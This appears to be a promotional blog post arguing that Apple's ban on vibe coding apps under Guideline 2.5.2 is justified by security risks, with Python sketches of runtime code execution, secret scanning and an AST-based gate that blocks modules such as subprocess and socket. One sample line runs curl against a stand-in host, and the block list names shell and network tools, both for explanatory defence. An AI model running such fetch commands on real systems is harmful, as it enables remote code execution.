Last week, Apple removed "Anything" from the App Store. The startup had raised $11M at a $100M valuation. Gone overnight.
Replit and Vibecode are also blocked from releasing updates.
The tech press is calling it anticompetitive. X is full of takes about Apple killing innovation. The narrative is simple: Apple wants you to use Xcode with their AI tools, not third-party vibe coding apps.
But here's what nobody's talking about: Apple cited Guideline 2.5.2. And that's a security rule, not a competition rule.
What Guideline 2.5.2 Actually Says
"Apps should be self-contained in their bundles, and may not read or write data outside the designated container area, nor may they download, install, or execute code which introduces or changes features or functionality of the app."
Vibe coding apps, by definition, do exactly what this rule prohibits. They download code, execute it, and change app functionality on the fly. That's the entire product.
This isn't arbitrary. The rule exists because dynamic code execution is a security nightmare.
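To make the risk concrete, here's a minimal sketch of the pattern 2.5.2 prohibits. The "download" is simulated with a string; in a real vibe coding app the source would come from an LLM response or a network fetch. The function and variable names are illustrative, not from any actual app:

```python
# Sketch of the pattern Guideline 2.5.2 prohibits: code that arrives
# after App Review and changes app behavior at runtime.

def run_generated_code(source: str) -> dict:
    """Execute code that did not exist when the app was reviewed."""
    namespace: dict = {}
    exec(source, namespace)  # static analysis never sees this code
    return namespace

# The reviewed binary contains none of this logic; it appears at runtime:
generated = "def new_feature(x):\n    return x * 2\n"
ns = run_generated_code(generated)
print(ns["new_feature"](21))  # prints 42
```

The point is structural: App Review can inspect `run_generated_code`, but it cannot inspect `generated`, because `generated` doesn't exist yet at review time.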
The Security Data Nobody's Citing
While everyone debates whether Apple is being anticompetitive, here's what's happening in the vibe coding security space:
- 35 new CVEs in March 2026 traced directly to AI-generated code vulnerabilities
- escape.tech scanned 5,600 live vibe-coded apps and found hundreds with exposed API keys and secrets
- UK's NCSC CEO called for vibe coding safeguards at RSA Conference this week
- Trend Micro published their vibe coding risk analysis yesterday, calling it a "real and growing threat"
- Harvard Gazette ran a piece today noting that vibe coders "don't typically need to concern themselves" with reliability, safety, and security
The problem is real. The question is whether banning apps is the right solution.
Why Vibe Coding Apps Are Uniquely Risky on iOS
Traditional iOS apps go through App Review. Apple scans them for malware, policy violations, and common security issues.
Vibe coding apps bypass this by generating code on-device after approval. The app that passes review is not the app users actually run. Whatever Claude or Codex generates next week isn't subject to any review.
This creates a few problems:
- Prompt injection attacks can generate malicious code without user awareness
- Supply chain vulnerabilities in the underlying LLMs propagate to every app built with them
- No static analysis is possible on code that doesn't exist until runtime
- Exposed secrets are common because vibe coders often don't know to protect them
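The exposed-secrets problem, at least, is mechanically detectable. A rough sketch of the regex-based scanning that tools in this space perform (these two patterns are illustrative only; production scanners ship hundreds of rules and entropy checks):

```python
import re

# Illustrative secret patterns; real scanners use far larger rule sets.
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "generic_secret": re.compile(
        r"(?i)(api[_-]?key|secret)\s*[:=]\s*['\"][^'\"]{8,}['\"]"
    ),
}

def scan_source(text: str) -> list[str]:
    """Return the names of secret patterns found in a source blob."""
    return [name for name, pat in SECRET_PATTERNS.items() if pat.search(text)]

leaked = 'API_KEY = "AKIAABCDEFGHIJKLMNOP"'
print(scan_source(leaked))  # both patterns fire on this line
```

This is exactly the kind of check that could run before deployment; the fact that thousands of live apps still fail it is the story.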
Apple's Real Mistake
Apple is right that there's a security problem. They're wrong about the solution.
Banning apps doesn't fix the underlying vulnerability. It just pushes vibe coding to the web, where the same apps can run without any review at all.
A better approach:
- Sandbox the generated code more aggressively
- Require on-device code review before execution
- Mandate secret scanning before deployment
- Create a certification program for vibe coding platforms that meet security standards
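What would "on-device code review before execution" even look like? One conceptual sketch, assuming a Python-like generated payload: walk the AST and reject code that touches capabilities the host app never approved. To be clear, AST screening alone is not a security boundary (a real sandbox needs OS-level isolation, which is Apple's home turf), but it illustrates the gate:

```python
import ast

# Hypothetical pre-execution gate for generated code. Blocklists are
# illustrative; a real policy would be an allowlist enforced by the OS.
BLOCKED_CALLS = {"eval", "exec", "open", "__import__", "compile"}
BLOCKED_MODULES = {"os", "subprocess", "socket", "ctypes"}

def review(source: str) -> list[str]:
    """Static check on generated code; returns policy violations found."""
    violations = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = [a.name for a in node.names]
            if isinstance(node, ast.ImportFrom) and node.module:
                names.append(node.module)
            violations += [n for n in names if n.split(".")[0] in BLOCKED_MODULES]
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in BLOCKED_CALLS:
                violations.append(node.func.id)
    return violations

print(review("import subprocess\nsubprocess.run(['curl', 'evil.sh'])"))
```

A certification program could require platforms to run a gate like this (plus sandboxing and secret scanning) and prove it, rather than being banned outright.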
Instead, Apple took the easy path: ban first, figure it out later.
What This Means for Vibe Coders
If you're building with Lovable, Bolt, Cursor, or any other AI coding tool:
Your iOS distribution options just narrowed. Web apps and PWAs are still fine. Native iOS apps generated by vibe coding tools face an uncertain future.
Security scanning is now table stakes. If you're shipping anything user-facing, run a scan before you deploy. Tools like VibeCheck, Aikido, or ChakraView can catch exposed secrets and common vulnerabilities.
The regulatory spotlight is coming. If Apple is cracking down, expect the EU, UK, and others to start asking questions about AI-generated code quality.
The vibe coding gold rush isn't over. But the "ship fast, worry later" phase might be.
Building something with AI coding tools? VibeCheck is a free security scanner for vibe-coded apps. Paste your GitHub URL or deployed site, get a security grade in seconds.
Follow @solobillionsHQ for daily vibe coding security updates.